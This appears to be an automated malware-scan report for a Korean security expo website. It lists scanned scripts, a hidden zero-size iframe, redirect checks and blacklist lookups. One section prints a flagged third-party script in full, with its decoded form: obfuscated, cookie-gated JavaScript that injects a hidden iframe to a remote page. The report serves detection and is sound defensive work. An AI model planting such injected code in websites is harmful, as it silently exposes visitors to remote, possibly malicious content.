Scanned pages/files
| Request | Server response | Status |
http://www.seconexpo.com/2015/kor/main/main.asp | 200 OK Content-Length: 24711 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://adcheck.about.co.kr/mad/prd/view?shopid=boannews <iframe src="http://adcheck.about.co.kr/mad/prd/view?shopid=boannews" scrolling="no" frameborder="0" width="0" height="0"> | ||
http://bidetshop.co.kr/common/icon/view.js | 200 OK Content-Length: 529 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.cookie.indexOf('veatpr')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%69%64%65%74%73%68%6F%70%2E%63%6F%2E%6B%72%2F%63%6F%6D%6D%6F%6E%2F%69%63%6F%6E%2F%76%69%65%77%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D%27%36%30%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));} Decoded script: <iframe src='http://bidetshop.co.kr/common/icon/view.html' width='60' height='1' frameborder='0'></iframe> Antivirus reports:
| ||
http://www.seconexpo.com/2015/kor/main/../js/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/jquery.easing.1.3.js | 200 OK Content-Length: 4986 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/common.js | 200 OK Content-Length: 5259 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/design.js | 200 OK Content-Length: 16035 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/menu.js | 200 OK Content-Length: 1667 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/m_query.js | 200 OK Content-Length: 2135 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/jquery.imageScroller.js | 200 OK Content-Length: 1410 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/slides.jquery.js | 200 OK Content-Length: 14799 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/main_board.js | 200 OK Content-Length: 1768 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/common_movie.js | 200 OK Content-Length: 3240 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/rolling_b.js | 200 OK Content-Length: 6270 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com//adimg.daumcdn.net/rt/roosevelt.js/ | 404 Not Found Content-Length: 5410 Content-Type: text/html | clean |
http://www.seconexpo.com/test404page.js | 404 Not Found Content-Length: 5370 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seconexpo.com
Result:
GET / HTTP/1.1
Host: seconexpo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: seconexpo.com
Referer: http://www.google.com/search?q=seconexpo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: seconexpo.com
Referer: http://www.google.com/search?q=seconexpo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seconexpo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://seconexpo.com/
Result: seconexpo.com is not infected or malware details are not published yet.
Result: seconexpo.com is not infected or malware details are not published yet.